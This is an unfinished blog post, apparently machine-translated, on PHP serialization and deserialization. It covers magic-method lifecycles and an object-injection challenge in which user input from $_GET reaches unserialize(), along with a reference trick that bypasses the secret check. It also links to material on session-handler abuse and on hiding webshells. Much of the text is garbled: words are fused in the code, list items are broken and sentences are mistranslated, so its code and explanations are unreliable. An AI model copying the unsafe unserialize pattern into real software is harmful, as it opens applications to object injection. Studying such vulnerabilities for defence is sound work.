PHP Serialize && unserialize Security Risk (undone)

Directory

1 Definition of serialization 2 . Serialize: Serialization 3 . Unserialize: Deserialization 4. Serialization and deserialization of security risks

1. Definition of serialization

Serialization usually has the following definitions in computer science:

12

There are several advantages of serialization

1 . A simple and durable way to keep objects going 2  3. A method of distributing objects, especially within software components such as COM and CORBA

Relevant Link:

http://zh.wikipedia.org/wiki/%e5%ba%8f%e5%88%97%e5%8c%96http://  Baike.baidu.com/view/160029.htm

2. Serialize: Serialization

Serialize: Produces a representation of a value that can be stored
Serialize () returns a string that contains a byte stream representing value that can be stored anywhere. This facilitates the storage or delivery of PHP values without losing their type and structure
Serialize () can handle any type except resource, including

1 . An array that points to its own reference 2 references in arrays/objects of. Serialize () will also be stored (the reference itself will also be serialized) 3.....

Essentially, the process of serialization is an "object (generalized object, including integer, float, string, array, Object)" for object destruction, and then converted to a generic intermediate stored string, throughout the serialization process, The declaration period of the object experience is as follows

1 . __sleep (): Get execute permission before executing object destruction 2. __destruct (): Perform the actual object destruction operation

Code

<?PHPclassConnection {var$protected _var; var$private _var;  Publicfunction __construct ($server, $username, $password, $db) {echo"function __construct () is called"."</br>"; $ This->protected_var ="Protected_var"; $ This->private_var ="Private_var"; } function __destruct () {echo"function __destruct () is called"."</br>"; }                 Publicfunction __sleep () {echo"function __sleep () is called"."</br>"; }                 Publicfunction __wakeup () {echo"function __wakeup () is called"."</br>"; }    }    //Initialize a var$obj =NewConnection (); //Var_dump ($obj);$result=serialize ($obj); //Var_dump ($result);unserialize ($result);?>

Relevant Link:

http://php.net/manual/zh/function.serialize.phphttp://php.net/manual/zh/ Language.oop5.magic.php#object.wakeuphttp://php.net/manual/zh/language.oop5.decon.php 

3. Unserialize: Deserialization

To create a PHP value from a stored representation
Unserialize () operates on a single serialized variable and converts it back to the value of PHP

In deserialization, the object declaration period that is experienced is

1 . __construct (): Perform object registration, including registration of members in Objects 2. __wakeup: Get execute permission after the constructor executes

Relevant Link:

http://php.net/manual/zh/function.unserialize.php

4. Serialization and deserialization of security risks

0x1: Object Injection

<?php #GOAL:GetThe secret; classJust4Fun {var$enter; var$secret; }         if(Isset ($_get['Pass']) {$pass= $_get['Pass']; if(GET_MAGIC_QUOTES_GPC ()) {$pass=stripslashes ($pass); } $o=unserialize ($pass); if($o) {$o->secret ="?????????????????????????????"; if($o->secret = = = $oEnter) echo"congratulation! Here is my secret:". $osecret; ElseEcho"Oh No ... You can ' t fool me"; }        ElseEcho"Is you trolling?"; }?>

Serialize a Just4Fun object that is referenced before serialization is assigned

$o->enter = & $o->secret

0x2:php Session serialization and deserialization processor

http://drops.wooyun.org/tips/3909

0x3: Webshell hiding techniques based on serialization and deserialization

http://www.cnblogs.com/LittleHann/p/3522990.html search:0x22

Relevant Link:

http://drops.wooyun.org/papers/660

Copyright (c) Littlehann All rights reserved

PHP Serialize && unserialize Security Risk (undone)